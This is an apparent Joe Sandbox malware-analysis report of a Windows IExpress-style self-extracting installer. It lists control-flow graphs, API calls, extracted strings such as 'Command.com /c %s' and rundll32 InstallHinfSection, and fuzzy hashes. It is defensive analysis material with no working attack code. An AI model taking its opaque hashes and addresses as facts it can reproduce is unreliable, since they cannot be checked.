                                                                                                                                                                                                                                                            control_flow_graph 141 df1ae8-df1b2c call df1680 144 df1b2e-df1b39 141->144 145 df1b3b-df1b40 141->145 146 df1b46-df1b61 call df1a84 144->146 145->146 149 df1b9f-df1bc2 call df1781 call df658a 146->149 150 df1b63-df1b65 146->150 157 df1bc7-df1bd3 call df66c8 149->157 152 df1b68-df1b6d 150->152 152->152 154 df1b6f-df1b74 152->154 154->149 156 df1b76-df1b7b 154->156 158 df1b7d-df1b81 156->158 159 df1b83-df1b86 156->159 166 df1bd9-df1bf1 CompareStringA 157->166 167 df1d73-df1d7f call df66c8 157->167 158->159 162 df1b8c-df1b9d call df1680 158->162 159->149 160 df1b88-df1b8a 159->160 160->149 160->162 162->157 166->167 168 df1bf7-df1c07 GetFileAttributesA 166->168 175 df1df8-df1e09 LocalAlloc 167->175 176 df1d81-df1d99 CompareStringA 167->176 170 df1c0d-df1c15 168->170 171 df1d53-df1d5e 168->171 170->171 174 df1c1b-df1c33 call df1a84 170->174 173 df1d64-df1d6e call df44b9 171->173 191 df1e94-df1ea4 call df6ce0 173->191 187 df1c35-df1c38 174->187 188 df1c50-df1c61 LocalAlloc 174->188 179 df1e0b-df1e1b GetFileAttributesA 175->179 180 df1dd4-df1ddf 175->180 176->175 177 df1d9b-df1da2 176->177 183 df1da5-df1daa 177->183 185 df1e1d-df1e1f 179->185 186 df1e67-df1e73 call df1680 179->186 180->173 183->183 189 df1dac-df1db4 183->189 185->186 192 df1e21-df1e3e call df1781 185->192 197 df1e78-df1e84 call df2aac 186->197 193 df1c3a 187->193 194 df1c40-df1c4b call df1a84 187->194 188->180 196 df1c67-df1c72 188->196 195 df1db7-df1dbc 189->195 192->197 211 df1e40-df1e43 192->211 193->194 194->188 195->195 201 df1dbe-df1dd2 LocalAlloc 195->201 202 df1c79-df1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 df1c74 196->203 210 df1e89-df1e92 197->210 201->180 207 df1de1-df1df3 call df171e 201->207 208 df1cf8-df1d07 202->208 209 df1cc2-df1ccc 202->209 203->202 207->210 213 df1d09-df1d21 GetShortPathNameA 208->213 214 df1d23 208->214 216 df1cce 209->216 217 df1cd3-df1cf3 call df1680 * 2 209->217 210->191 211->197 212 df1e45-df1e65 call df16b3 * 2 211->212 212->197 219 df1d28-df1d2b 213->219 214->219 216->217 217->210 223 df1d2d 219->223 224 df1d32-df1d4e call df171e 219->224 223->224 224->210
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00DF1BE7
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00DF1BFE
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00DF1C57
                                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 00DF1C88
                                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00DF1140,00000000,00000008,?), ref: 00DF1CB8
                                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00DF1D1B
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                            • API String ID: 383838535-2280873615
                                                                                                                                                                                                                                                            • Opcode ID: 9765d50d5554f0aca9e052cb7a0c4a295cb6d4457adc05020b12e51431afdbf1
                                                                                                                                                                                                                                                            • Instruction ID: fb81a624ca5d9775a09b63e8f66bde5bca28bc802d49468d0c790c2894ce95ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9765d50d5554f0aca9e052cb7a0c4a295cb6d4457adc05020b12e51431afdbf1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1A1F478A0031CEBDB209B24DC45BFA7769DB51310F1AC295E799E32C1DBB09E85CA70
                                                                                                                                                                                                                                                            Function 00DF597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 384 df597d-df59b9 GetCurrentDirectoryA SetCurrentDirectoryA 385 df59dd-df5a1b GetDiskFreeSpaceA 384->385 386 df59bb-df59d8 call df44b9 call df6285 384->386 387 df5ba1-df5bde memset call df6285 GetLastError FormatMessageA 385->387 388 df5a21-df5a4a MulDiv 385->388 401 df5c05-df5c14 call df6ce0 386->401 398 df5be3-df5bfc call df44b9 SetCurrentDirectoryA 387->398 388->387 391 df5a50-df5a6c GetVolumeInformationA 388->391 395 df5a6e-df5ab0 memset call df6285 GetLastError FormatMessageA 391->395 396 df5ab5-df5aca SetCurrentDirectoryA 391->396 395->398 400 df5acc-df5ad1 396->400 411 df5c02 398->411 404 df5ad3-df5ad8 400->404 405 df5ae2-df5ae4 400->405 404->405 407 df5ada-df5ae0 404->407 409 df5ae7-df5af8 405->409 410 df5ae6 405->410 407->400 407->405 413 df5af9-df5afb 409->413 410->409 416 df5c04 411->416 414 df5afd-df5b03 413->414 415 df5b05-df5b08 413->415 414->413 414->415 417 df5b0a-df5b1b call df44b9 415->417 418 df5b20-df5b27 415->418 416->401 417->411 420 df5b29-df5b33 418->420 421 df5b52-df5b5b 418->421 420->421 423 df5b35-df5b50 420->423 424 df5b62-df5b6d 421->424 423->424 425 df5b6f-df5b74 424->425 426 df5b76-df5b7d 424->426 427 df5b85 425->427 428 df5b7f-df5b81 426->428 429 df5b83 426->429 430 df5b87-df5b94 call df268b 427->430 431 df5b96-df5b9f 427->431 428->427 429->427 430->416 431->416
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00DF59A8
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00DF59AF
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00DF5A13
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00DF5A40
                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00DF5A64
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF5A7C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00DF5A98
                                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00DF5AA5
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00DF5BFC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6285: GetLastError.KERNEL32(00DF5BBC), ref: 00DF6285
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                                            • Opcode ID: e18d1339316209f7499988e70a1bff9b568aa457af7f801b79d2cdc28153726d
                                                                                                                                                                                                                                                            • Instruction ID: 6a9858dcd75c4701dc6492ffe5703394357df9aff736ccb2c83fdfbd8d508d0f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e18d1339316209f7499988e70a1bff9b568aa457af7f801b79d2cdc28153726d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF7182B190070CAFEB159B64EC85FFA77ACEB48340F09C1A9F646D6244DA309E85CB34
                                                                                                                                                                                                                                                            Function 00DF4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 434 df4fe0-df501a call df468f FindResourceA LoadResource LockResource 437 df5161-df5163 434->437 438 df5020-df5027 434->438 439 df5029-df5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 438->439 440 df5057-df505e call df4efd 438->440 439->440 443 df507c-df50b4 440->443 444 df5060-df5077 call df44b9 440->444 449 df50e8-df5104 call df44b9 443->449 450 df50b6-df50da 443->450 448 df5107-df510e 444->448 451 df511d-df511f 448->451 452 df5110-df5117 FreeResource 448->452 458 df5106 449->458 450->458 462 df50dc 450->462 454 df513a-df5141 451->454 455 df5121-df5127 451->455 452->451 460 df515f 454->460 461 df5143-df514a 454->461 455->454 459 df5129-df5135 call df44b9 455->459 458->448 459->454 460->437 461->460 464 df514c-df5159 SendMessageA 461->464 465 df50e3-df50e6 462->465 464->460 465->449 465->458
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00DF4FFE
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00DF5006
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00DF500D
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00DF5030
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00DF5037
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00DF504A
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00DF5051
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00DF5111
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00DF5159
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                            • Opcode ID: 4a02148dfbf53652ff55ba33ca40041252f96f08f11ccf0124d3504b4d455339
                                                                                                                                                                                                                                                            • Instruction ID: 7d66f3ba12f3b14c48dd42aa22597ce5d119a659e95973d506de083c0f35ef5d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a02148dfbf53652ff55ba33ca40041252f96f08f11ccf0124d3504b4d455339
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F231E2B0B4070A7FD7205B69BD89F77769CA704754F0AC024BB0AE2399DBA59C40CA71
                                                                                                                                                                                                                                                            Function 00DF2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 510 df2f1d-df2f3d 511 df2f3f-df2f46 510->511 512 df2f6c-df2f73 call df5164 510->512 513 df2f5f call df3a3f 511->513 514 df2f48 call df51e5 511->514 521 df2f79-df2f80 call df55a0 512->521 522 df3041 512->522 520 df2f64-df2f66 513->520 519 df2f4d-df2f4f 514->519 519->522 524 df2f55-df2f5d 519->524 520->512 520->522 521->522 528 df2f86-df2fbe GetSystemDirectoryA call df658a LoadLibraryA 521->528 523 df3043-df3053 call df6ce0 522->523 524->512 524->513 532 df2ff7-df3004 FreeLibrary 528->532 533 df2fc0-df2fd4 GetProcAddress 528->533 535 df3017-df3024 SetCurrentDirectoryA 532->535 536 df3006-df300c 532->536 533->532 534 df2fd6-df2fee DecryptFileA 533->534 534->532 546 df2ff0-df2ff5 534->546 538 df3026-df303c call df44b9 call df6285 535->538 539 df3054-df305a 535->539 536->535 537 df300e call df621e 536->537 550 df3013-df3015 537->550 538->522 542 df305c call df3b26 539->542 543 df3065-df306c 539->543 554 df3061-df3063 542->554 548 df306e-df3075 call df256d 543->548 549 df307c-df3089 543->549 546->532 560 df307a 548->560 551 df308b-df3091 549->551 552 df30a1-df30a9 549->552 550->522 550->535 551->552 556 df3093 call df3ba2 551->556 558 df30ab-df30ad 552->558 559 df30b4-df30b7 552->559 554->522 554->543 563 df3098-df309a 556->563 558->559 562 df30af call df4169 558->562 559->523 560->549 562->559 563->522 565 df309c 563->565 565->552
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00DF2F93
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00DF2FB2
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00DF2FC6
                                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00DF2FE6
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00DF2FF8
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00DF301C
                                                                                                                                                                                                                                                              • Part of subcall function 00DF51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DF2F4D,?,00000002,00000000), ref: 00DF5201
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 2126469477-1173327654
                                                                                                                                                                                                                                                            • Opcode ID: 769e09eb66e209ee4f422b5232a556e8868227d05ddad924767f5474158d311c
                                                                                                                                                                                                                                                            • Instruction ID: 3eb8826fe891c301ce96f4db6a3b924a6191624fdea3bb6649e25c16f2274d9b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 769e09eb66e209ee4f422b5232a556e8868227d05ddad924767f5474158d311c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241AD30A0034D9ADB20AF75EC45A7A77A8DF44750F0BC166AB45C2295EF74CF84CA72
                                                                                                                                                                                                                                                            Function 00DF5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 589 df5467-df5484 590 df551c-df5528 call df1680 589->590 591 df548a-df5490 call df53a1 589->591 595 df552d-df5539 call df58c8 590->595 594 df5495-df5497 591->594 596 df549d-df54c0 call df1781 594->596 597 df5581-df5583 594->597 604 df554d-df5552 595->604 605 df553b-df5545 CreateDirectoryA 595->605 606 df550c-df551a call df658a 596->606 607 df54c2-df54d8 GetSystemInfo 596->607 600 df558d-df559d call df6ce0 597->600 611 df5585-df558b 604->611 612 df5554-df5557 call df597d 604->612 609 df5577-df557c call df6285 605->609 610 df5547 605->610 606->595 615 df54fe 607->615 616 df54da-df54dd 607->616 609->597 610->604 611->600 623 df555c-df555e 612->623 618 df5503-df5507 call df658a 615->618 621 df54df-df54e2 616->621 622 df54f7-df54fc 616->622 618->606 626 df54e4-df54e7 621->626 627 df54f0-df54f5 621->627 622->618 623->611 624 df5560-df5566 623->624 624->597 628 df5568-df5575 RemoveDirectoryA 624->628 626->606 629 df54e9-df54ee 626->629 627->618 628->597 629->618
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF54C9
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF553D
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF556F
                                                                                                                                                                                                                                                              • Part of subcall function 00DF53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00DF53FB
                                                                                                                                                                                                                                                              • Part of subcall function 00DF53A1: GetFileAttributesA.KERNELBASE(?), ref: 00DF5402
                                                                                                                                                                                                                                                              • Part of subcall function 00DF53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?), ref: 00DF541F
                                                                                                                                                                                                                                                              • Part of subcall function 00DF53A1: DeleteFileA.KERNEL32(?), ref: 00DF542B
                                                                                                                                                                                                                                                              • Part of subcall function 00DF53A1: CreateDirectoryA.KERNEL32(?,00000000), ref: 00DF5434
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                            • API String ID: 1979080616-3374052426
                                                                                                                                                                                                                                                            • Opcode ID: 33d4c8559229beb70d5b5166ae24000acf83f27cf64c547e6e8db499acae6336
                                                                                                                                                                                                                                                            • Instruction ID: 3379c2946f496561a23f3d8757576725d92364d6bd32d3bde119a6c8a8c74f06
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33d4c8559229beb70d5b5166ae24000acf83f27cf64c547e6e8db499acae6336
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C31F871B00B0D9BCB106F29BC44A7EB69AEB81340B5BC16AAB45D274CDA70CE45C6B5
                                                                                                                                                                                                                                                            Function 00DF2390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00DF8A3A,00DF11F4,00DF8A3A,00000000,?,?), ref: 00DF23F6
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00DF11F8), ref: 00DF2427
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00DF11FC), ref: 00DF243B
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00DF2495
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00DF24A3
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00DF24AF
                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00DF24BE
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00DF8A3A), ref: 00DF24C5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                                            • Opcode ID: a0e044640b340b0decf4af0d1f61ff5ca35fdda01b574436f7ff805deca56971
                                                                                                                                                                                                                                                            • Instruction ID: d482072879fb4d4d29d8e63f8037f95a40d5825cce43b2e04f579f49e71815cc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0e044640b340b0decf4af0d1f61ff5ca35fdda01b574436f7ff805deca56971
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD3181712047489BC320DB68DC89AFB73ACABD4305F06C92DB699C6290EF74990DC772
                                                                                                                                                                                                                                                            Function 00DF3FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00DF4033
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DF4049
                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(?,?), ref: 00DF405C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DF409C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DF40A8
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00DF40DC
                                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00DF40E9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
